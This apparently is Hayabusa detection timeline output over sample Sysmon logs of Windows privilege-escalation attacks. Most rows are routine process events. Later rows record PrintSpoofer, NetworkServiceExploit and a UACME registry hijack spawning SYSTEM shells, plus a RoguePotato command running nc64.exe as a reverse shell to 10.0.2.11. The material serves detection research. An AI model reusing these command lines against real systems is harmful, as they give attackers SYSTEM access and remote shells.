| PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\Temp | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 
07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCache | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetHistory | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCookies | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc | LID: 0x1d39b | PID: 5840 | PGUID: 747F3D96-B76F-5EA4-0000-0010624D0600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p 
-s Appinfo | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6964 | PGUID: 747F3D96-B776-5EA4-0000-0010A74D0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x1d39b | PID: 7000 | PGUID: 747F3D96-B776-5EA4-0000-001006590B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 6656 | PGUID: 747F3D96-B79B-5EA4-0000-00105BD50F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 318 0000021FF2606500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6648 | PGUID: 747F3D96-B79B-5EA4-0000-001075DA0F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 748 | PGUID: 747F3D96-B79B-5EA4-0000-001001FC0F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Discovery - domain time | Cmd: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 | Process: C:\BGinfo\BGINFO.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 7056 | PGUID: 747F3D96-B7A0-5EA4-0000-001026D11000 | Hash: SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\SecurityHealthService.exe | Process: C:\Windows\System32\SecurityHealthService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 7088 | PGUID: 747F3D96-B7A0-5EA4-0000-001027D81000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x1d39b | PID: 3376 | PGUID: 747F3D96-B7A0-5EA4-0000-00108D131100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 864 | PGUID: 747F3D96-B7A2-5EA4-0000-0010982F1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 3256 | PGUID: 747F3D96-B7A5-5EA4-0000-0010CAB51300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 258 0000021FF266EC20 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7036 | PGUID: 747F3D96-B7A5-5EA4-0000-0010EAB91300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 4480 | PGUID: 747F3D96-B7AA-5EA4-0000-001066001700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2792 | PGUID: 747F3D96-B7D4-5EA4-0000-0010E09B1700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 6548 | PGUID: 747F3D96-B7DE-5EA4-0000-0010FA4E1800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 992 | PGUID: 747F3D96-B7DF-5EA4-0000-001052671800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1396 | PGUID: 747F3D96-B7DF-5EA4-0000-001080711800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-05-03 03:01:52.553 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 7212 | PGUID: 747F3D96-B49D-5EAD-0000-001029FEBE00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PrintSpoofer.exe -i -c powershell.exe | Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x812b1 | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: System | PID: 4 | PGUID: 747F3D96-6AB8-5EAD-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: powershell.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PrintSpoofer.exe -i -c powershell.exe | LID: 0x3e7 | PID: 1428 | PGUID: 747F3D96-B592-5EAD-0000-0010D4CDC200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe | LID: 0x3e7 | PID: 6004 | PGUID: 747F3D96-B595-5EAD-0000-00106BFDC200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-07 22:13:01.683 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - T1088 - UACBypass - changepk UACME61 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Launcher.SystemSettings\shell\open\command\(Default): c:\Windows\System32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 7084 | PGUID: 747F3D96-095D-5EB4-0000-001082FF1700,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\ChangePk.exe"" | LID: 0x2ecba | PID: 5216 | PGUID: 747F3D96-095E-5EB4-0000-0010D46F1800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | Process: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.647 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\frAQBc8Wsa1 | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.662 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\frAQBc8Wsa1 | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected, | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | LID: 0x3e7 | PID: 372 | PGUID: 747F3D96-4640-5EB7-0000-0010EF364B01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 7672 | PGUID: 747F3D96-4647-5EB7-0000-0010B3454B01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 180 | PGUID: 747F3D96-46A4-5EB7-0000-00109FE74C01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:11:20.824 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.101:49683 (MSEDGEWIN10) | Dst: 192.168.56.1:139 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | Process: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
